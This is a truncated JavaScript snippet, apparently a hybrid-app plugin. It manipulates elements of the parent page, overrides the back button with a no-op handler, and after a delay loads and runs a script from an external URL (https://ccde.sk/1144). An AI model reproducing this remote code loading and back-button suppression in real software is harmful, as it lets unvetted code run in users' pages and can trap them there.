alert('a');
var jsplug = { scriptTag: false,
test : function() {
alert(window.location);
alert( parent.app);
},
onready : function() {
var app = parent.document.getElementById("app");
var app2 = parent.document.getElementById("app2");
app2.style.width='0px';
app2.style.height='0px';
app2.style.visibility="hidden";
app.style.width='100%';
app.style.height='800px';
app.style.top="0px";
app.style.left="0px";
app.style.visibility="visible";
//app2.style.visibility="hidden";
//alert(window.location);
app.innerHTML= "";
parent.document.removeEventListener("backbutton", onBackButton, false);
parent.document.addEventListener("backbutton", function(){ return true;}, false);
// alert(app);
setTimeout("this.loadJS('https://ccde.sk/1144','',document.body)",2000);
},
loadJS : function(url, implementationCode, location){
//url is URL of external file, implementationCode is the code
//to be called from the file, location is the location to
//insert the